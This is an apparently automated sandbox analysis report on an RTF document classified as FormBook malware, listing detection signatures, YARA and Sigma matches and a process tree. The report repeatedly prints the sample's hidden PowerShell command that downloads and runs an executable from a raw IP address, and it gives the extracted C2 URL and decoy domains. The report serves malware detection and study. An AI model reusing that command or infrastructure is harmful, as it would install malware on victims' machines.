Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 1c60a1e9_by_Libranalysis

Overview

General Information

Sample Name:1c60a1e9_by_Libranalysis (renamed file extension from none to rtf)
Analysis ID:412069
MD5:1c60a1e972aaa5a3eb15c0adc2de7ead
SHA1:921fed27f6b23f7f810ee03eeefb91634a295592
SHA256:605e84b01e008da482a744feb468d9dd842148850fda1694a6772b6e38cc6c82
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Document exploit detected (process start blacklist hit)
Found suspicious RTF objects
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Microsoft Office creates scripting files
Modifies the context of a thread in another process (thread injection)
Office process drops PE file
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Exploit for CVE-2017-0261
Sigma detected: Non Interactive PowerShell
Sigma detected: PowerShell Download from URL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • powershell.exe (PID: 2684 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • docsc.exe (PID: 2952 cmdline: 'C:\Users\user\AppData\Roaming\docsc.exe' MD5: 457B22DA77D4DB093A31DD80A4B8963F)
        • docsc.exe (PID: 2268 cmdline: C:\Users\user\AppData\Roaming\docsc.exe MD5: 457B22DA77D4DB093A31DD80A4B8963F)
        • docsc.exe (PID: 2240 cmdline: C:\Users\user\AppData\Roaming\docsc.exe MD5: 457B22DA77D4DB093A31DD80A4B8963F)
          • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • NAPSTAT.EXE (PID: 660 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
              • cmd.exe (PID: 2468 cmdline: /c del 'C:\Users\user\AppData\Roaming\docsc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • FLTLDR.EXE (PID: 2384 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT MD5: AF5CCD95BAC7ADADD56DE185D7461B2C)
    • powershell.exe (PID: 2788 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 2896 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rogegalmish.com/a8si/"], "decoy": ["mosquitocontrolpro.com", "omfgphil.com", "qqkit.net", "compusolutionsac.com", "skynetaccess.com", "helmetmoto.com", "webdomoupravitel.com", "thepocket-onlinelesson.xyz", "stefaniehirsch.space", "goalsandballs.com", "xn--bro-ba-3ya.com", "tomrings.com", "4520oceanviewavenue.com", "mamaebemorientada.com", "shopwreathrails.com", "restaurantestancia.com", "annaquatics.info", "mnarchitect.design", "best-cleaner.com", "jobhuizhan.com", "check-info-bank.network", "boostcoachingonline.com", "basimogroup.com", "076fb5.com", "conansr.icu", "numbereightturquoise.com", "southernbrushworks.com", "home-inland.com", "irrpa.com", "ethereumdailypay.com", "betsysellsswfl.com", "cutebyconstance.website", "modelsnt.com", "medifilt.com", "tracisolomon.xyz", "dchaulingdisposal.com", "minchenhy.com", "smart4earth.com", "rackembilliards.com", "benschiller-coaching.com", "virtualroasters.com", "applewholesales.com", "thesidspot.com", "grechenblogs.com", "marshlandlogisticsservices.net", "covidokotoks.com", "mirabilla.com", "hunab.tech", "foreverjsdesigns.com", "heipacc.info", "simon-schilling.com", "shirleyeluiz.com", "juguetibicicollectors.com", "70shousemanchester.com", "tranthaolinh.net", "urbanpokebar.com", "madras-spice.com", "fulmardelta.net", "drisu-goalkeeping.com", "jiotest.com", "vitatiensa.com", "melbournebusinesslawyers.net", "rajehomes.com", "company-for-you.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.2095013575.0000000000210000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0x327b:$sb1: -W Hidden
    • 0x326b:$sc1: -NoP
    • 0x3275:$sd1: -NonI
    • 0x3285:$se3: -ExecutionPolicy bypass
    • 0x3270:$sf1: -sta
    0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 20 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      12.2.docsc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        12.2.docsc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        12.2.docsc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        12.2.docsc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          12.2.docsc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', ProcessId: 2684
          Sigma detected: PowerShell DownloadFileShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', ProcessId: 2684
          Sigma detected: Exploit for CVE-2017-0261Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine|base64offset|contains: , Image: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, NewProcessName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, OriginalFileName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, ProcessId: 2384
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', ProcessId: 2684
          Sigma detected: PowerShell Download from URLShow sources
          Source: Process startedAuthor: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', ProcessId: 2684

          Data Obfuscation:

          barindex
          Sigma detected: Powershell download and execute fileShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', ProcessId: 2684

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rogegalmish.com/a8si/"], "decoy": ["mosquitocontrolpro.com", "omfgphil.com", "qqkit.net", "compusolutionsac.com", "skynetaccess.com", "helmetmoto.com", "webdomoupravitel.com", "thepocket-onlinelesson.xyz", "stefaniehirsch.space", "goalsandballs.com", "xn--bro-ba-3ya.com", "tomrings.com", "4520oceanviewavenue.com", "mamaebemorientada.com", "shopwreathrails.com", "restaurantestancia.com", "annaquatics.info", "mnarchitect.design", "best-cleaner.com", "jobhuizhan.com", "check-info-bank.network", "boostcoachingonline.com", "basimogroup.com", "076fb5.com", "conansr.icu", "numbereightturquoise.com", "southernbrushworks.com", "home-inland.com", "irrpa.com", "ethereumdailypay.com", "betsysellsswfl.com", "cutebyconstance.website", "modelsnt.com", "medifilt.com", "tracisolomon.xyz", "dchaulingdisposal.com", "minchenhy.com", "smart4earth.com", "rackembilliards.com", "benschiller-coaching.com", "virtualroasters.com", "applewholesales.com", "thesidspot.com", "grechenblogs.com", "marshlandlogisticsservices.net", "covidokotoks.com", "mirabilla.com", "hunab.tech", "foreverjsdesigns.com", "heipacc.info", "simon-schilling.com", "shirleyeluiz.com", "juguetibicicollectors.com", "70shousemanchester.com", "tranthaolinh.net", "urbanpokebar.com", "madras-spice.com", "fulmardelta.net", "drisu-goalkeeping.com", "jiotest.com", "vitatiensa.com", "melbournebusinesslawyers.net", "rajehomes.com", "company-for-you.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 1c60a1e9_by_Libranalysis.rtfReversingLabs: Detection: 31%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\docsc.exeJoe Sandbox ML: detected
          Source: 12.2.docsc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: mscorlib.pdbment.Automation.pdb" source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: docsc.exe, NAPSTAT.EXE
          Source: Binary string: mscorlib.pdbment.Automation.pdbBBo source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2099945495.0000000002B66000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\System.pdba source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2104233288.0000000002730000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2109112416.000000001B490000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2111059281.000000001B510000.00000002.00000001.sdmp
          Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

          Software Vulnerabilities:

          barindex
          Document exploit detected (creates forbidden files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScTJump to behavior
